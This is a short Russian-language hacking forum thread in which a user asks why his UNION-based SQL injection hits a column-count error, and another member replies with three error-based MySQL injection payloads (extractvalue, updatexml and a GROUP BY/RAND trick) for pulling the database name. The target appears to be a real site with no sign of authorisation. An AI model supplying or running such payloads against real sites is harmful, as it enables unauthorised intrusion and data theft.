Вчем причина не совпадения столбцов при sql запросе

Discussion in 'Песочница' started by Glorph, 15 Oct 2017.

  1. Glorph

    Glorph New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер. пытаюсь провести sql инъекцию. с помощью GROUP
    by выяснил что всего 12 столбцов. но когда ввожу union select 1,2,3...12 мне выдается "The used SELECT statements have a different number of columns"
     
  2. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Пробуй Error based
    and extractvalue(1,concat(0x3a,(database())))-- -
    and updatexml(NULL,concat(0x3a, ( select database())),Null)-- -
    SELECT COUNT(*)FROM(SELECT1UNIONSELECT2UNIONSELECT3)xGROUPBYCONCAT(MID(database(),1,63),FLOOR(RAND(0)*2))-- -
     
  3. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Он уже попробовал...
    ... а до него там это попробовали разного рода хакиры ещё 100500 тысяч раз! :)
     
  4. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Ну ошибка говорит , что не правильное количество столбцов подобрал.
     
  5. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Я говорил об этом...

    Он попробовал и потом всё получилось, и, как позже выяснилось, это получилось не только у него! :)
     
  6. Glorph

    Glorph New Member

    Joined:
    12 Oct 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    всем спасибо за помощь буду разбираться в sql. людям которые написали в личку отдельное спасибо. если будут вопросы (а они будут) надеюсь не откажете в объяснение в личке. я понял что банальные мануалы по sql injection не подойдут. необходимо углубиться в сам язык. тему можно закрывать